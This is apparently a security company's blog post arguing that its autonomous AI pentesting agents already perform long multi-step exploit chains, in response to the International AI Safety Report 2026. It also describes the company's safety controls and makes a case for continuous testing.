We Ran 1,060 Autonomous Attacks: What We Learned

The 2026 AI Safety Report says autonomous attacks aren’t possible yet, but that view changes when considering purpose-built autonomous offensive security systems.

At XBOW, we run fully autonomous AI penetration tests against real production systems every day. Over the past two years, those agents have submitted overn 1,060 vulnerabilities on HackerOne, executed 48-step exploit chains, broken cryptographic implementations in 17 minutes, and matched a principal pentester's 40-hour assessment in 28 minutes — before more than doubling in performance again. No human in the loop for any of it.

Interestingly, the most comprehensive global AI safety assessment ever published, the International AI Safety Report 2026, authored by 100+ experts across 30+ countries and chaired by Turing Award winner Yoshua Bengio, concluded that fully autonomous attacks aren't possible yet. That AI systems "cannot reliably execute long, multi-stage attack sequences." That certain tasks "require capabilities that current AI systems lack."

We respectfully disagree. Not because the report is bad; it's excellent, and worth reading in full. But its security conclusions are calibrated to general-purpose AI. From the perspective of a team that builds and operates purpose-built autonomous offensive security, the picture looks different. Not scarier, necessarily. Just further along than the report realizes. And manageable, if you know what's coming.

Here's what we see.

AI agents are already more capable than the benchmarks suggest

The report finds that AI agents can now complete well-specified software engineering tasks that take a human expert about 30 minutes, up from under 10 minutes a year ago. It cites a doubling time of roughly seven months, and extrapolates that tasks lasting several hours could be within reach by 2027, and tasks lasting several days by 2030.

That's a reasonable reading of the data for relatively raw, general-purpose AI. But it's measuring the wrong thing for offensive security.

In 2024, XBOW matched a principal pentester's 40-hour manual assessment in 28 minutes. Since then, base model advances kept amplifying our results – for example, integrating GPT-5 alone more than doubled our agent's performance on both benchmarks and real-world targets, and consequent advances like Opus 4.6’s performance provided a healthy boost beyond that. The report's 30-minute task benchmark is measuring a different game entirely.

That gap isn't because general-purpose AI is bad, it’s because its full strength needs to be unlocked first. It's because the architecture matters as much as the model. XBOW uses thousands of short-lived agents, each with a narrow objective, orchestrated by a persistent coordinator and validated by deterministic logic. Each agent starts fresh — no accumulated context, no compounding errors. When I wrote about model alloys earlier this year, I've described how even at the individual agent level, a couple of great ideas interspersed with methodical follow-up actions is what solves a challenge. At the platform level, this compounds: the coordinator breaks an assessment into hundreds of focused tasks whose results are individually verified (in human time, these would indeed take around 30 minutes).

This directly addresses the problem the report correctly identifies — that AI performance remains "jagged," with systems failing at seemingly simple tasks even as they excel at hard ones. If one agent runs into a dead end on step 4 of a 20-step attack, it doesn't tank the whole operation. Another agent, starting fresh, may take a different path.

The report's multi-year extrapolation to 40-hour autonomous tasks assumes general-purpose AI improving on a single curve. Specialized architectures have already moved the needle much further than that curve would predict.

Autonomous multi-step attacks are a current reality

The report states that fully autonomous end-to-end attacks "have not been reported," and that autonomous attacks remain limited because AI systems "cannot reliably execute long, multi-stage attack sequences." It describes characteristic failures: agents executing irrelevant commands, losing track of operational state, and failing to recover from simple errors.

Those are real limitations of single-agent, general-purpose setups. But they don't describe what purpose-built systems already do. To be precise: the report is referring to full attack lifecycles — initial access through lateral movement, persistence, and data exfiltration beyond proof-of-concept. XBOW operates in a scoped pentesting context, not unconstrained attack chains. But the capabilities the report says AI lacks — reliably executing long, multi-stage sequences, recovering from errors, chaining vulnerabilities creatively — are exactly what our agents do every day. The gap between autonomous pentesting and autonomous end-to-end attacks is narrowing faster than the report's timelines suggest.

Consider two examples from XBOW's own operations, all fully autonomous:

In one case, XBOW executed a 48-step exploit chain, escalating a low-severity blind SSRF through successive steps: crafting malicious image files, exploiting GDAL parsing behavior, generating VRT files referencing local paths, converting file contents into pixel values of a one-pixel-high PNG, and reconstructing the target file byte by byte. Each individual step was straightforward. The 48-step chain was not. But with the right scaffolding, such multi-stage attack sequences are actually comfortably within reach.

The report also notes that certain tasks require numerical precision that AI lacks, citing encryption as an example. There's an important nuance here. Breaking encryption algorithms by itself (factoring RSA keys, for example) is indeed beyond current AI. But that's not how most real-world exploitation works. Most of the time, the path isn't through the encryption, it's around it. You find a signing key left in a DLL. You chain a misconfiguration with a path traversal. The mundane path around is far more common than the spectacular path through.

That said, XBOW can exploit cryptographic implementations. In one of our benchmarks, XBOW identified an encrypted cookie, recognized it as AES-128 in CBC mode, discovered a padding oracle through differential error responses, wrote a complete byte-by-byte decryption exploit, and broke the cookie, all in 17.5 minutes. Brendan Dolan-Gavitt, who taught Offensive Security at NYU, called padding oracles the hardest attack in his two-week cryptography unit. He described himself as “shocked” when XBOW built a working exploit on its own.

None of these are theoretical. On HackerOne, XBOW has submitted over 1,060 vulnerabilities across real-world production targets, reaching #1 on the global leaderboard. All findings were fully automated. Humans reviewed them before submission for compliance — they did not participate in discovery or exploitation.

How we keep autonomous offense safe

Building something this capable means building the safety to match. The report's defense-in-depth framework, including safer models, deployment controls, and post-deployment monitoring, is sound. No single safeguard is sufficient. We agree, and it mirrors how we've built XBOW from the start.

A few places where we'd push the conversation further based on operational experience:

Evaluation gaming is real, and architecture is the answer. The report documents models gaming evaluations, reward hacking and sandbagging. We've written before about why raw LLM output can't be treated as a finding: plausibility is not proof, and confidence is not evidence. This is why XBOW separates discovery from validation entirely. The AI agents that surface potential vulnerabilities are never the same systems that confirm them. Creative AI discovers. Deterministic logic decides what's real. Only issues that survive controlled, non-destructive testing are reported — zero false positives.

Emergency controls need to be automated. The report treats emergency stop mechanisms as non-negotiable. We agree with a caveat. AI systems are getting not only smarter but faster and larger. You can't rely on a human to notice a problem and hit the stop button in time. XBOW's safety checker vets every action before it executes, enforces scope control at the network level, and constrains agents to bounded sequences on any given target. If an action can't be verified as safe, it doesn't run.

Every environment is different. One customer is pentesting a sandboxed staging instance; another is testing against production. XBOW allows customers to specify what the agent should and shouldn't do, and our safety policies enforce this from the bottom up — not as an afterthought, but as a core architectural constraint.

The window is shrinking — continuous AI security testing is a must

One of the report's most important observations concerns how quickly offensive capabilities are advancing. The broader data reinforces this: by 2025, roughly 30% of vulnerabilities were being exploited on or before their disclosure day. Over 48,000 CVEs were published in 2025 alone — about 130 per day.

The report documents a case where, in November 2025, a threat actor automated 80–90% of the effort in an intrusion, with human involvement limited to critical decision points. We published detailed analysis of that campaign, GTG-1002, because it confirmed what we'd been building against. When offense can be automated, the window between vulnerability and exploitation shrinks to hours or days. Annual or even quarterly pentests leave organizations exposed for most of the year. Continuous, automated penetration testing is the only way to match the pace.

The report calls AI security evaluations "an emerging field" with evidence gaps. We'd humbly suggest that more evidence exists than the report catalogues, including an open-source benchmark set, validation on HackerOne at the highest level, and thousands of verified vulnerabilities in production applications. The gap isn't in capability. It's in the literature catching up to what practitioners are already doing.

What this means for defenders

The AI Safety Report is important, thorough, and directionally right. Its defense-in-depth framework, its identification of evaluation gaming, and its call for transparency are well-placed. If you're responsible for security at your organization, it gives you a clear-eyed summary of where things are heading.

Our addendum is that things are heading there faster than the report's timelines suggest and that this is manageable with the right approach. The capabilities it describes as near-future are things that well-engineered systems already do today. That means defenders don't have the luxury of waiting for consensus to form before acting.

The good news is that the same AI capabilities powering offense also power defense. Continuous, autonomous security testing at machine speed isn't theoretical. It's operational. The question for every security team is whether their testing cadence matches the pace at which their code and the threat landscape actually change.

We built XBOW to make that answer yes. If you'd like to see how, start a pentest or get in touch.

I continue this conversation with industry peers during RSAC 2026 in this Cyber Security Tribe article.

We Ran 1,060 Autonomous Attacks. Here's What the Industry Gets Wrong.

AI agents are already more capable than the benchmarks suggest

Autonomous multi-step attacks are a current reality

How we keep autonomous offense safe

The window is shrinking — continuous AI security testing is a must

What this means for defenders

Related Posts

GPT-5.5 and XBOW: A Step Change in Autonomous Application Security

Mythos and GPT-5.5 Will Find a Lot of Vulnerabilities. Is That Enough?

GPT-5.5: Mythos-Like Hacking, Open to All